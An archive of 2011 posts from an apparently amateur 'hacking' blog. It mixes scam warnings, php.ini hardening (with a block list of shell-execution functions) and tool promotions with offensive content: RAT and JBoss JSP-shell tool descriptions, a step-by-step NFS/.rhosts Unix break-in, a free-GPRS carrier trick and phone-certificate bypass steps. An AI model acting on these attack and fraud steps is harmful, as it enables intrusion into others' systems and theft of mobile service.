Apr 30, 2011

The Truth Behind Hacking Facebook Websites - Revealed

FACEBOOK HACKING GENUINE OR SCAM??

When you search the internet for HACKING FACEBOOK ACCOUNTS you come across many websites offering you to hack facebook accounts for 100$ or for a survey. Not only websites also there are lot's of free facebook hacking software available on the internet. They are completely fake and can also be backdoored.

http://hacking-facebook.com/
http://www.hackfacebook.org/

I found this two for a example to show you guys

Now the first sites hack you accounts for 100usd


"You can pay for our service right after Facebook account is hacked. " their websites tell this .. So how can they believe us that we will pay after a account being hacked ??

I can tell you that in any step if they will ask you some personal information's then it will be a very wise idea to close the website... instead of hacking the other's account you will lose your accounts .. this is called social engineering. Using this information they can take over your account.

Sometimes it also may happen they will tell to give your login details too .. as mentioned by h4ck0lic bro this method is called "TROLLING"


Ok now lets talk about the second link.. 

Hacking accounts without the user knowledge is itself illegal so how you can say hacking using their method is legal ?


" * It is 100% FREE due to the massive demand and load on our servers we may soon need to charge a fee, so hurry while the offer lasts.
* It is 100% LEGAL Using this method you can be assured that there is NOTHING ILLEGAL, unlike all other software and methods, Hotmail Password Cracker users 100% legal methods of Hacking Facebook Account passwords
* It is SIMPLE access our gateway and see for yourself! "
^^ they say the above ..

I can say that is a scam to fool you guys he will get the money because of the CPA survey he have in his..

How i told this is a scam ???

There is a page present

http://www.hackfacebook.org/HackFacebookAccounts.html

For your sake I filled it and got empty results.

Then, I thought to go and see what is next .. then I came across a link

http://www.hackfacebook.org/ThankYou.html (CPA SURVEY HERE )

Now look at their strategy through which they fool us...

we open the main page which then redirects to the page

http://www.hackfacebook.org/HackFacebookAccounts.html

This the main thing which makes convince that this site is a pure legit site hack Facebook

Further Inspection told that the last page have a CPA survey in it and that site tell to complete the survey  in order to get access to their gateway (what ever ) ...  

What will happen then ?

The happening will make you sad you will complete the survey but surprisingly no links no gateways through which you can get passwords.


Better do not fall into these traps huh? 


WEBOPEDIA - The experts choice

Hacking and Security both the words are related to one thing THE COMPUTER.. Now the computer also have its own living style..

Some Words are there in the world of Computers which are difficult to understand... like SSID , OEM ,WI-FI , OSI , CPU , etc etc

It becomes damn difficult to know the meanings when you dont have a dictionary ( oxford doesn't gives meanings )

So Now I have a very good dictionary for you guys :)

WeBOpeDia The HacKerS ChoIce

Go here and see it yourself :)

do reply here


Apr 27, 2011

[EASY]Change the Adminstrator password while logged to the computer

This tutorial is going to be the easiest and the smallest tutorial ever.I will tell you how to reset/change the computer administrator account


For this you need to be logged in to the computer

Then go to RUN and type control userpasswords2

Now comes the fun part

  • Select the user 
  • Click on Reset Password 
  • And Reset Your Password 

Tutorial finish :D

I will post another good tutorial on password cracking when i will have some time

Apr 25, 2011

Mozilla Easter Eggs

Easter Egg means  Hidden Surprises. Software's developers leave some  surprises for you knowingly this surprise is called Easter eggs :D


1. Robots
• In the address bar, type:
• about:robots
• Now watch what happens.

 Click on the try again button and see something :P

2. Firefox inside Firefox
• Open Firefox
Enter  the following in the address bar:
• chrome://browser/content/browser.xul 

 3. Firefox Red Screen
• Open Firefox
• In address bar type
• about:mozilla
• Now see What happens.


4. Kitchen Sink• Load Firefox
• Enter an address of about:kitchensink
• You can
play with the tap

This Easter Egg doesn't works with new Firefox Browsers.



Hope you liked this ;) 

BodgeIt Strore the vulnerable web application for penetration testers

Various applications such as vulnerable web applications such as Jarlsberg, WackoPicko, Damn Vulnerable Web Application (DVWA), Vicnum, etc. Now we have another application that is vulnerable and ready to be exploited! The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to penetration testing.

Features
  • Easy to install – just requires java and a servlet engine, e.g. Tomcat
  • Self contained (no additional dependencies other than to 2 in the above line)
  • Easy to change on the fly – all the functionality is implemented in JSPs, so no IDE required
  • Cross platform
  • Open source
  • No separate db to install and configure – it uses an ‘in memory’ db that is automatically (re)initialized on start up
Install
 you need to do is download and open the zip file, and then extract the rar file into the webapps directory of your favorite servlet engine.

You may use http://www.apachefriends.org/en/xampp-windows.html#522 for this

DOWNLOAD bodgeit.1.1.0.zip

Thank You 



Apr 23, 2011

Making a PHP RAT | VB.NET



What is a RAT ?


The RAT connects using standard TCP/IP protocol, as long as the server file is loaded on the target victim computer. Once this file has been loaded once, the operator of the client end of the tool can then modify the registry to cause this file to be started everytime Windows starts, ensuring the hacker will always have access to the infected system.

Once access has been established, the hacker has almost complete control over his target. Every file on the system can be renamed, moved, deleted, frozen, changed, replaced, anything you can imagine. WAV files can be played, or played on loop, to annoy the hell out of the receiving end. Video and still images can be captured to have a log of the computer's visual activity.

In addition to this, the tool allows the hacker to share additional drives over the network, such as floppy or CD drives, allowing the hacker to write files to floppies or open/close the CD-ROM drive.

A more serious tool in the hacker's possession is the ability to log all keystrokes on the infected machine, allowing him to acquire passwords from the system. In addition, it can also acquire cached passwords, such as Windows Logon passwords, making the system incredibly vulnerable to attack and vandalism.

Finally, if the hacker is persistent enough, he can prevent the user from removing the tool from a variety of ways, short of disabling the network. Shutting down, locking, and restarting the computer are all options to stop the victim from removing the trojan, unless the network connection is broken.


Watch the VIDEO 


 note- PHP RAT DOESN'T NEED PORT FORWARDING 

Credits to - The original makers of this video

Happy Hacking

Apr 22, 2011

The Web Application Hackers Handbook



The Web Application
Hacker’s Handbook

===============================
Discovering and Exploiting Security Flaws



This E Book is one of my favorite ones

I am only Going to give a brief Intro about the book here..Rest you go and read


This E-book is a practical guide to discovering and exploiting security flaws in web applications. By “web application” we mean an application that is accessed by using a web browser to communicate with a web server. We examine a wide variety of different technologies, such as databases, file systems, and web services, but only in the context in which these are employed by web applications. If you want to learn how to run port scans, attack firewalls, or break into servers in other ways, we suggest you look elsewhere. But if you want to know how to hack into a web application,  steal sensitive data, and perform unauthorized actions, then this is the book for you.

Overview of This Book

The focus of this book is highly practical. While we include sufficient background and theory for you to understand the vulnerabilities that web applications contain, our primary concern is with the tasks and techniques that you need to master in order to brea into them. Throughout the book, we spell out the specific steps that you need to take to detect each type of vulnerability, and how to exploit it to perform unauthorized actions. real-world examples, derived from the authors’ many years of experience, illustrating how different kinds of security flaw manifest themselves in today’s web applications. Security awareness is usually a two-edged sword. Just as application developers can benefit from understanding the methods used by attackers, hackers.

Download This E-Book From - HERE 
password for the file - saurav

Happy Hacking

Apr 20, 2011

JBoss Autopwn - JSP Hacking Tool

This JBoss script puts a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
Features
  • Multiplatform support – tested on Windows, Linux and Mac targets
  • Support for bind and reverse bind shells
  • Meterpreter shells and VNC support for Windows targets
Installation

  • Netcat
  • Curl
  • Metasploit v3, installed in the current path as “framework3″
You can download JBoss Autopwn here:

Download From here





Apr 17, 2011

Change Proxy | Change Your Proxy Using Firefox


♥ I love Proxies ♥

What Are Proxies ?
In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol.go here for learning more

Now Up to the Topic  (Changing your proxy)

We change it for - anonymity  purposes
Requirements 
i)A browser - (In my case i am gonna use Firefox)
ii)Fresh Proxies (Not Dead or Outdated Ones)


For Proxy I am Going To Use - Hidemyass's Proxy Lists 

There we can get very fast and updated servers That is why i ♥ it :D


S     T    E    P    S

I am now going to use a fast German proxy for this tutorial




Then go to Tools>Options>Advance>Network tab>Settings



 Click on OK you are done then :D


Notes-
  • this proxy was a example proxy using this which i used may cause malfunctions in your connection
  • Always Do with a FRESH PROXY 
  • Do select a proxy with good speed and connection time (I suggest using US/UK proxies)
  • After finishing your work again follow the above steps and click on Auto-Detect proxy setting for this network
Hope You enjoyed this small tutorial


Happy Hacking

Wapiti - The Web Vulnerability Scanner

Wapiti allows you to check the security of your web applications.
It performs "black-box" scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data.
Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.


Vulnerabilities Wapiti Can Detect

  • File Handling Errors (Local and remote include/require, fopen, readfile...) 
  •  Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections) 
  • XSS (Cross Site Scripting) Injection
  • LDAP Injection
  • Command Execution detection (eval(), system(), passtru()...)
  • CRLF Injection (HTTP Response Splitting, session fixation...)
Wapiti is able to differentiate ponctual and permanent XSS vulnerabilities.
Wapiti prints a warning everytime it founds a script allowing HTTP uploads.
A warning is also issued when a HTTP 500 code is returned (useful for ASP/IIS)
Wapiti does not rely on a vulnerability database like Nikto do. Wapiti aims to discover unknown vulnerabilities in web applications.
It does not provide a GUI for the moment and you must use it from a terminal.

 

For More Visit here

Happy Hacking

Installation Tutorial Of Signed Browsers In S60v2 And JAVA Phones

Installation Tutorial For s60v2 phones

1.Extract *.jad and *.jar from the zipped file and transfer it to c:/nokia/install folder,

2.Go to to phone Menu>Tools>App.Manager,

3.In the App.Mngr,click the uninstalled *.jad file to start offline installation,

4.Do the installation procedures, and select for installation drive when ask,

5.IF SUCCESSFUL, THE INSTALLATION WILL COMPLETE!

6.Now, without exiting from the app. manager, find the installed application and from suite settings, you can now set NETWORK ACCESS, CONNECTIVITY, MULTIMEDIA, READ USERS DATA, AND EDIT USERS DATA TO ALWAYS ALLOWED.REMEMBER, DO NOT SET APP. AUTO START TO ALWAYS ALLOWED SINCE IT WILL REVERT BACK NETWORK ACCESS TO ASK EVERY TIME (IMPORTANT FOR BROWSERS). ALSO MESSAGING HAS NO OPTIONS OTHER THAN NOT ALLOWED AND ASK EVERY TIME, SO CHOOSE THE LATER.

7.Now, exit from app. manager and enjoy your signed java application!

Tutorial For JAVA Phones

Here I am going to give a tut to sign java application for Nokia s-40 and Sony Ericsson mobile.
Required app and cert-

1.)oxycube(a Computer mobile media file browser)


2.)behappy (Computer app)


3.)CERT

The process is divided into 2 parts-

1.cert installation
2.signing of app

1.Installation of cert-1 thing to note that for nokia phones we need to use a darkman cert(exp.cer) and for Sony Ericsson phones we need mobile review(halmer.cer)

a.)For Nokia s40-first download oxycube via Google search.Install oxycube on your PC and connect your phone with it.Now go to c:/hiddenfolder/certificates/user/ and delete the contents of this folder and paste the 2 files of user exp folder which i uploaded in zip file.now u have installed the darkman cert on ur phone.Now check in your phone the exp.cer file in settings/security/user certificates/certificate list .if it exists mean u have successfully installed the darkman cert

b.)For Sony Ericsson-i m not sure for Sony Ericsson. First copy halmer.cer file from zip archive and paste in ur phone .Now click on it and install the cert

2.)Signing of app====2methods

a.)Off-line signing
b.)On-line signing

a.)For off-line signing of any java app for darkman certificate first install behappy on ur Computer and drag,drop ur jar file to behappy window or open behappy and click on open and select the jar file.now a MSG pop-up as the app is signed.it will create a JAD certificate file of the used jar file.Now send both jar and jad file to ur phone and select the permissions as always allowed.

b.)For on-line signing go to http://simak.ru this is a Russian site use Google translated site go here

Now click on on line certifier and select the permissions and phone model and paste the link of ur jar file and download both jar and JAD file and send it to ur phone.if u haven¡¯t the link of the file u want to sign then first upload your file to a free uploading site and get the url of your file.paste this URL at simak.ru and sign your application

Happy signing

By- Saurabh Khare (Mobile Expert)

Aircel Free GPRS Using Handler Browsers | India



Aircel Free GPRS Using Handler Browsers

Hi aircel user! we have an exclusive free GPRS trick for you .
It has been tested in 3G and 2G. it works fine when you are in roaming also.
So to use this new GPRS trick you have to use handler browser

What the heck is Handler Browser ?

Don;t cry i am gonna tell it. A browser which is used to make phone use of custom settings like IP post. HTTP server etc is called a handler browser


Lets get to work....
First of all open the handler browser and then select proxy as host(usually the 3rd last option in handler menu)
now write there "0.facebook.com" without the quotes and you are good to go

Now enjoy full fledged GPRS in Your Aircel Sim.

We would suggest you to use this at as low balance as possible cause prevention is always better then cure :-D

Ucweb Browser Extreme Mod For This Trick

Download Unsigned

Download Signed

Remember since its a signed browser u will need to follow the procedure in this post

By- Saurabh Khare (MOBILE EXPERT)

Apr 14, 2011

Web Fraud | Internet Scams | Email Scams



Now a days the internet Scams and Frauds are very popular.Every day every one is getting one email or sms from fraud peoples who are in a intention to loot the peoples they make a promise to give  a huge amount on money to give you for that they ask many money from you like "First you have to transfer a 100$ to our bank account to claim your money"

Here is a scam sms i got only yesterday.

"your Number have been selected and won 10000$ to claim it contact at clksk@hotmail.com with your details"

SEE A EXAMPLE OF A SCAM
=========================================================================
Mark <mark2010.2010@rediffmail.com>
to "INFOR@2010.COM" <INFOR@2010.com>
subject GO FOR YOUR WINNING CONTACT US TODAY AT:claim_uk_2010@hotmail.com


GO FOR YOUR WINNING CONTACT US TODAY AT:claim_uk_2010@hotmail.com



CONGRATULATION; YOUR EMAIL ADDRESS HAS WON THE SUM OF 500,000.00 UNITED

KINGDOM GREAT BRITISH POUNDS (GBP) IN THIS ON GOING AWARD WINNING PROMOTION

2010 IN UNITED KINGDOM – LONDON. FOR YOU TO CLAIM YOU’RE WINNING PRIZE

AMOUNT FUNDS SUM OF FIVE HOUNDED THOUSAND UNITED KINGDOM GREAT BRITISH

POUNDS YOU HAVE TO SEND YOU PERSONAL INFORMATION DETAILS BELOW SO THAT THE

YAHOO/MSN AWARD WINNING PROMOTION DEPARTMENT WILL SEND A DIPLOMATIC AGENT

DOWN TO YOUR COUNTRY TO DELIVER YOU WINNING PRIZE PERSON TO YOU AT YOUR

DOOR STEP.


FULL NAME:
COUNTRY:
STATE:
CITY:
ADDRESS:
s3x:
OCCUPATION:
MOBILE NUMBER:
TELEPHONE NUMBER:
A SCAN COPY OF ANY IDENTITY CARD OF YOURS:

PLEASE FILL THIS FORM AND SEND IT BACK TO US SO THAT WE CAN PROCEED FOR

YOUR WINNING PRIZE AMOUNT FUNDS DELIVERING OK ONCE AGAIN CONGRATULATION, WE AWAIT TO HEAR FROM YOU SOON
========================================================================

If you have a brain you will think WHY THEY WILL GIVE US SO MUCH OF MONEY ???

There are a number of SCAMS there .... see below the list

  • Credit Card Scam
  • Loan and Mortgage Scams
  • Job Scams 
  • SMS Scams
  • Lottery Scams 
  • PTC Scams


etc.....
I would suggest you to visit this website to see the scams in details


You can be safe and make other aware about these SCAMS you need to be alerted and never fall a prey in these scams..

The Fraud Guys use different places for sending different email so it becomes very difficult for the local police to catch them..Usually these guys work in a group more than 5 to 6 peoples 

PREVENTION METHODS 

  • checking the web address–even if one character is different, it can mean it's a different website.
         ALL INDIAN GOVT. SITES END WITH A DOMAIN gov.in ... ex -India.gov.in


  • Never enter your private information unless it is a secure site and you know who you are dealing with. Secure and trusted sites are locked with a padlock in the browser window or a secured URL at the beginning of the address (https://)
  • If you got a email Report it to the cyber crime  department.
     Indian Cyber Crime Phone Number : 1800 209 6789
    You can report with the Cyber Crime department if you have a case which is related to Cyber stalking, cyber harassment, Online harassment, unsolicited calls, pornographic MMS, online fraud, phishing, or even threat mails.


      Have a look at this link too http://www.consumerfraudreporting.org/

THINGS TO LOOK AT

-Email sent from gmail,yahoo,hotmail
-Unsolicited emails from strangers who are advertising a website–do not click on web links in these emails(May have a malware in it )
-unexpected emails requesting personal information or emails with generic greetings like ‘Dear Customer’ instead of your name
-Offers guaranteeing you for a job with a very high salary.

Earning on internet is interesting and joyful you have to just differentiate the genuine or the scam..If not you are

  THIS IS A BIG ISSUE RUNNING IN ALL THE COUNTRIES..PREVENTION IS THE ONLY WAY


Apr 11, 2011

--- UNIX Attacks ---



In this article i am going to discuss how to attack a Unix based system using LOCAL and REMOTE attacks.

Unix Local Attacks

What Does it means ? 

When you are up to gain root on a file server, one method  to start with is to gain at least limited access on the system. There are large number of exploits to "Exploit the root" but many require you have an account on the box. Here is an example : 

  • Gain access to server www.saurav.com via guest account 

  • The server is running older version of linux

  • Move around on Bugtraq or some other place with exploit code, and find an exploit for one of the outdated or unpatched programs or subsystems.

  • Compile it and run it to become the root


How the Exploits Work ?

There are several different attack techniques you can use from a local account and the handy exploit you are running. Here are a few common ones with  simple explanations:

Misconfiguration
If excessive permission exist on certain directories and files, these can lead to gaining higher levels of access. For example, if /dev/kmem is writable, it is possible to rewrite your UID to match root's. Another example would be if a .rhosts file has read/write permissions allowing anyone to write them. Yet another example would be a script launched at startup, cron, or respawned. If this script is editable, you could add commands to run with the same privileges as who started them (for startup rc files, this would be as root).
Poor SUID
Sometimes you will find scripts (shell or otherwise) that perform certain tasks and run as root. If the scripts are writable by your id, you can edit it and run it. For example, we once found a shutdown script world writable. By adding a few lines at the beginning of the script it was possible to have the script create a root shell in /tmp.
Buffer Overflow
Buffer overflows are typically used to spawn root shells from a process running as root. A buffer overflow could occur when a program has a buffer for user-defined data and the user-defined data's length is not checked before the program acts upon it. See the next question for more details.
Race Conditions
A Race Condition is when a program creates a short opportunity for evil by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration. If the permissions on that temporary file allow it to be edited, it might be possible to alter it before the program finishes its editing process.
Poor Temp Files
Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temp files and what permissions these temp files have, it might be possible to use links to create root-owned files.

Unix Remote Attacks

What are remote attacks ?


A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from your PC.(depends on your OS)

Remote hacks come in  different ways.Usually exploiting an existing service running on the victim server is the goal. Exporting a NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons running might be subject to buffer overflows remotely, allowing someone from a remote location run arbitrary commands on the victim server.

 

 Here is a examples:

  1. You are root on a host named saurav.
  2. You discover the host victim is exporting /home2/old read/writable to the world.
  3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.
  4. Quickly, you create a fred account on saurav.
  5. Now you mount /home2/old and create an .rhosts file to establish trust with saurav.
  6. After you become fred on saurav, you rlogin to the victim as fred.

References- Wikipedia,nmrc


Happy Hacking

 




Apr 3, 2011

PHP Security | Securing php.ini




Php.ini is PHP's default configuration file.This file is generally found in etc/php.ini on many Linux systems.This file contains a host of functionality that is used to secure web applications.Many php users and admins are unfamiliar with the various options that are available with php.ini. By tweaking a few security related options in the file you can strengthen the web application running on it 

PHP SAFE MODE
PHP safe mode is a comprehensive "attempt to solve the shared server security problem" that includes many useful features. Safe mode effectively checks if functions in one file on the server that affect other files all have the same ownership. For instance, if you have a page saurav.php that attempts to read the contents of a directory img/. Safe mode with check the UID of saurav.php and the img/ directory. If they match then the script will be allowed access, if they don't match then safe mode will disable access. This is an interesting security mechanism that allows you to restrict access by scripts outside of the normal application installation directory. Safe mode may cause problems though when the web server ends up owning files (for example when a new file is uploaded or created by an application it is usually owned by 'apache' or a similar web server account).

Safe mode will also restrict executables  that may be executed by scripts in the same way it restricts file and directory access. Safe mode can also be configured so that only executables in a certain directory can be run. This can help limit exposure of shell commands to certain scripts.

To enable safe mode,  the safe mode directive in the php.ini to: 

safe_mode = On
 
In some cases you'll want to use a group to check ownership. To have safe mode check group permissions use: 
safe_mode_gid = On 

If you want to limit directories that can contain included files or executables use the following php.ini directives respectively: 
 
safe_mode_include_dir = /path/to/dir
safe_mode_exec_dir = /path/to/exec/dir
 
Safe mode has several other useful features that are worth looking into.go to their website to learn more 
 
Restricting Includes
 
Using the open_basedir directive in PHP makes a lot of sense given most file include vulnerability vectors. This directive limits all PHP file operations to the listed directory and below. It is common for attackers to search for ways to include local files in PHP scripts to expose local filesystem files through the web server. For instance, if an attacker found a file inclusion vulnerability they might try to include the /etc/passwd file to enumerate all the user accounts on the system. With the open_basedir directive PHP can restrict file inclusion to the web root, for instance /var/www. Once set files outside that directory cannot be included in scripts, and thus the aforementioned attack would fail. To enable the open_basedir directive update your php.ini file to include:
 
open_basedir = /path/to/web/root
   
Disabling Functionality
 
There are certain functions in PHP that you probably don't want your developers to use because of the danger they pose. Even if you know your users aren't utilizing certain functions it is wise to completely disable them so an attacker can't use them. This security precaution is especially effective at stopping an attacker who has somehow managed to upload a PHP script, write one to the filesystem, or even include a remote PHP file. By disabling functionality you ensure that you can limit the effectiveness of these types of attacks. It should be noted that it is virtually impossible to do something like preventing an attacker from executing a command at a shell by disabling functions, but it can certainly stop an attacker who isn't a skillful PHP programmer.

disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo
 

Preventing Information Disclosure

Attackers will often use information that your web server exposes in order to gain information about the server configuration, application layout, and components. Error messages are some of the most common paths to information disclosure, often leaking information such as application installation path, database connectivity, data model details such as table and column names, and script details such as variables. While this debugging information is invaluable to developers it is useless to end users and dangerous to expose to attackers. PHP debugging output should be disabled in the php.ini using:

display_errors = Off
 
This prevents PHP from showing run time errors in pages served to users. PHP will continue to log the errors as normal, however, so they can be reviewed by developers. Be wary of developer tactics to end run PHP errors, however, as disabling this functionality does not prevent information disclosure. Some developers may use custom debugging output nested in HTML comments, third party tools like FirePHP, or writing PHP error logs to local directories using .htaccess files and the error_log directive. However, by preventing the display of errors by default you reduce the possibility of exposing information to attackers.

Disable Globals

Global variables are a horrible hold over from the PHP 3 days. In most distributions register global variables is set to off (and thankfully it won't be supported in future versions of PHP). However, you should ensure that the directive is properly in place. You should find the following in your php.ini file:

register_globals = Off
Register globals allows various HTTP variables to be used without specifying their source. For instance, if a developer wants to use a URL variable named 'id', for instance from the URL request index.php?id=4, with globals they can simply use $id rather than $_GET['id']. This is a great convenience but it can cause collisions. For instance, if a form post uses a variable called 'id' and there is a variable $id defined in a script and a user alters the URL of the script to include an 'id=' in the URL which variable has precedence? Even more damaging is the ability of attackers to override configuration variables such as DOCUMENT_ROOT from the URL. This can cause no end of problems, especially if attackers are able to call scripts that are normally included in other scripts and expect predefined variables, which could be overwritten via GET variables by an attacker.
Many legacy applications may require globally registered variables. If this is the case at least limit the configuration to specific application directories rather than throughout your PHP installation. You can do this using PHP directives in .htaccess files included in specific directories. Ensure that register_globals is set to Off, however, in your php.ini configuration!

Disable Remote File Includes

Attackers will often attempt to identify file inclusion vulnerabilities in applications then use them to include malicious PHP scripts that they write. Even if an attacker doesn't have write access to the web application directories if remote file inclusion is enabled the attacker can host malicious PHP scripts on other servers and the web application will fetch them and execute them locally! This can have devastating consequences. To restrict remote file execution be sure the following appears in your php.ini file:

allow_url_fopen = Off
allow_url_include = Off
This prevents remote scripts from being included and executed by scripts on your system.

Restrict File Uploads

If you're not utilizing file upload functionality in any of your PHP scripts then it's a good idea to turn it off. Attackers will attempt to (mis)use file uploads to quickly inject malicious scripts into your web applications. By disabling file uploads altogether this makes moving scripts onto your web server more difficult. To disable file uploads change the file_uploads directive in your php.ini to read:

file_uploads = Off
Even if you do allow file uploads you should change the default temporary directory used for file uploads. This can be done by changing the upload_tmp_dir directive. You may also want to restrict the size of files that can be uploaded. This is usually more of a system administration alteration than a security fix, but it can be useful. Use the upload_max_filesize directive for this purpose. To restrict upload directories and file sizes change your php.ini so that it reads:

upload_tmp_dir = /var/php_tmp
upload_max_filezize = 2M

Protect Session Cookies

Session stealing is a popular attack that allows a malicious user to hijack the session of a legitimate user. Using session hijacking an attacker can bypass authorization and access portions of web applications without authorization. PHP uses strong (meaning long pseudo randomly generated) session identifiers so that guessing a session id is extremely difficult. When logging into a PHP application you can view your cookies and likely identify a cookie with an name like 'phpsessid' and a value similar to 'bbbca6bb7a23bdc8de3baef2b506e654'. The cookie is composed of 32 hexadecimal characters, making it extremely hard to predict. The flaw in this system, however, is that these session identifiers are written to the filesystem when they're created so PHP can keep track of them. Changing the default location of these session identifiers will confound some attempts to read them. To change the location where session information is written alter the session.save_path in the php.ini configuration so that it points to your desired location like so:

 
session.save_path = /var/lib/php

Make sure that the web server can read and write to the location you specify, however, or sessions won't work. You may also wish to set PHP so that it writes cookies in such a way that they are inaccessible to JavaScript. If you don't have any PHP applications that utilize JavaScript to manipulate cookies this is a great idea. Attackers will often exploit Cross Site Scripting (XSS) flaws in web applications to inject JavaScript into pages, which could be used to steal session cookies. By setting the php.ini directive:
 
session.cookie_httponly = 1

you restrict JavaScript from accessing your cookies. Another small security feature is allowing PHP to check HTTP referer values so that session information is only passed internally while a user is viewing an application. This prevents users from accidentally publishing session information in a way that would allow external users to follow links and steal a session. This is especially useful if session information is being passed in a URL that could accidentally be published to a mailing list or web site. To enable this functionality use the following in your php.ini:

session.referer_check = your_url.tld

 Source - Tech_Mantras
 

 Happy Hacking

 

 
 
 
 

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More